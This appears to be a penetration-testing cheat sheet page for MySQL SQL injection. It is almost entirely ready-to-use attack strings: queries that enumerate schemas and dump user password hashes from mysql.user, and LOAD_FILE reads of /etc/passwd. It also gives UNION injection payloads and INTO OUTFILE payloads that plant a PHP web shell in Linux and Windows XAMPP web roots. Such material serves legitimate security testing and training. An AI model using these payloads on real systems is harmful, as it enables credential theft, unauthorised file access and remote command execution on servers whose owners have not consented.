MySQL Cheatsheet

SELECT database()
SELECT schema_name FROM information_schema.schemata
SELECT schema_name FROM information_schema.schemata LIMIT 1
SELECT schema_name FROM information_schema.schemata LIMIT 2,1    <-- Grab second entry output limit of 1 
SELECT group_concat(schema_name,":") FROM information_schema.schemata
SELECT group_concat(schema_name,"\r\n") FROM information_schema.schemata
SELECT group_concat(host,":",user,":",password,"\r\n") FROM mysql.user

SELECT schema_name FROM information_schema.schemata

select group_concat(TABLE_NAME,":",COLUMN_NAME,"r\n") from information_schema.COLUMNS where TABLE_SCHEMA = 'hotel'

select group_concat(host,":",user,":",password,"\r\n") from mysql.user

LOAD_FILE("/etc/passwd")
TO_base64(LOAD_FILE("/etc/passwd"))

'union select 1,2,3,4,5-- -

' union select 1, table_name, column_name, table_schema, 5 from 
information_schema.columns where table_schema=database() -- //

SQL injection into RCE

select user()

Check write privileges

select group_concat(grantee,is_grantable,0x3c62723e) from information_schema.user_privileges

For Linux

union select ("<?php system($_GET["cmd"]);?>),2,3,4,5 into outfile
"/var/www/html/cmd.php" -- -

' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, 
null, null INTO OUTFILE "/var/www/html/tmp/cmd.php" -- -

For Windows Xampp

union select 1,('<?php echo shell_exec($_GET["cmd"]); ?>'),3 into outfile 'C:\\xampp\\htdocs\\cmd.php'-- -

PreviousSQL Injection NextMSSQL Cheatsheet

Last updated 1 year ago